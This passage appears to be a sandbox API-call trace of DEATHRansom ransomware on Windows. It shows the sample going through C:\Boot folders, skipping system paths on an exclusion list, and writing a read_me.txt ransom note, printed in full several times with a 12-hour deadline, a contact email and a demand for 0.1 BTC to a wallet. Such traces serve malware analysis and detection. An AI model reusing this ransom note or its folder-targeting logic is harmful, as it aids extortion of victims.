ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.620] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0073.620] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.620] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.620] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0073.620] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.620] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.620] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt") returned 29 [0073.620] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt" (normalized: "c:\\boot\\fi-fi\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.621] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.621] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.622] CloseHandle (hObject=0x7a8) returned 1 [0073.622] GetProcessHeap () returned 0x280000 [0073.622] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a800a0 | out: hHeap=0x280000) returned 1 [0073.622] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0073.622] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0073.622] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0073.622] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0073.622] StrStrW (lpFirst="fonts", lpSrch="programdata") returned 0x0 [0073.622] StrStrW (lpFirst="fonts", lpSrch="$recycle.bin") returned 0x0 [0073.622] StrStrW (lpFirst="fonts", lpSrch="program files") returned 0x0 [0073.622] StrStrW (lpFirst="fonts", lpSrch="windows") returned 0x0 [0073.622] StrStrW (lpFirst="fonts", lpSrch="all users") returned 0x0 [0073.622] StrStrW (lpFirst="fonts", lpSrch="appdata") returned 0x0 [0073.622] GetProcessHeap () returned 0x280000 [0073.622] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0073.622] lstrcpyW (in: lpString1=0x8a800a0, lpString2="\\\\?\\C:\\Boot\\Fonts" | out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0073.622] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 9 [0073.622] QueueUserWorkItem (Function=0x40a710, Context=0x8a800a0, Flags=0x0) returned 1 [0073.622] GetProcessHeap () returned 0x280000 [0073.622] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0073.623] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0073.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.623] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0073.623] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.623] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0073.624] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0073.624] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0073.624] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.624] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\read_me.txt") returned 29 [0073.624] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\read_me.txt" (normalized: "c:\\boot\\fonts\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.626] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.626] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.627] CloseHandle (hObject=0x7a8) returned 1 [0073.627] GetProcessHeap () returned 0x280000 [0073.627] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0073.627] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0073.627] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0073.627] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0073.627] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="programdata") returned 0x0 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="$recycle.bin") returned 0x0 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="program files") returned 0x0 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="windows") returned 0x0 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="all users") returned 0x0 [0073.627] StrStrW (lpFirst="fr-fr", lpSrch="appdata") returned 0x0 [0073.627] GetProcessHeap () returned 0x280000 [0073.627] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0073.627] lstrcpyW (in: lpString1=0x8a900a8, lpString2="\\\\?\\C:\\Boot\\fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0073.627] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 10 [0073.627] QueueUserWorkItem (Function=0x40a710, Context=0x8a900a8, Flags=0x0) returned 1 [0073.627] GetProcessHeap () returned 0x280000 [0073.627] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0073.628] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0073.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.629] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0073.629] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.629] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.629] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.629] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0073.629] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.629] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.629] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0073.629] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.630] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.630] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt") returned 29 [0073.630] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt" (normalized: "c:\\boot\\fr-fr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.630] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.630] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.631] CloseHandle (hObject=0x7a8) returned 1 [0073.631] GetProcessHeap () returned 0x280000 [0073.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0073.631] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0073.631] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0073.631] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0073.631] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="programdata") returned 0x0 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="$recycle.bin") returned 0x0 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="program files") returned 0x0 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="windows") returned 0x0 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="all users") returned 0x0 [0073.631] StrStrW (lpFirst="hu-hu", lpSrch="appdata") returned 0x0 [0073.631] GetProcessHeap () returned 0x280000 [0073.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0073.631] lstrcpyW (in: lpString1=0x8aa00b0, lpString2="\\\\?\\C:\\Boot\\hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0073.632] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 11 [0073.632] QueueUserWorkItem (Function=0x40a710, Context=0x8aa00b0, Flags=0x0) returned 1 [0073.632] GetProcessHeap () returned 0x280000 [0073.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.633] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0073.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, 